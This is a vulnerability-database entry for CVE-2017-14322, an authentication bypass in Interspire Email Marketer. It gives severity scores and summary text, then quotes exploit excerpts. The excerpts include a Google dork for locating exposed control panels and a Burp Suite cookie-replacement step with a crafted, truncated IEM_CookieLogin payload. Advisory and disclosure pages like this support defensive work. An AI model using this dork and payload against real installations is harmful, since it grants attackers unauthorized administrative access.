9.8
CVSSv3

CVE-2017-14322

Published: 18/10/2017 Updated: 10/05/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The function in charge to check whether the user is already logged in init.php in Interspire Email Marketer (IEM) before 6.1.6 allows remote malicious users to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value.

Vulnerable Product Search on Vulmon Subscribe to Product

interspire email marketer

Exploits

''' # Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass # Google Dork: intitle:"Control Panel" + emailmarketer # Date: 4-22-18 # Exploit Author: devcoinfet # Vendor Homepage: wwwinterspirecom/emailmarketer # Software Link: Can't legally provide link but can be found on net # Version: [613-616] # Tested on: Below ...
nterspire Email Marketer versions prior to 616 suffer from a remote administrative authentication bypass vulnerability ...

Github Repositories

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit Google Dork intitle:"Control Panel" + emailmarketer Exploit using Burp Suit Add a Match and Replace for Request header like below: Match: ^Cookie*$ Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE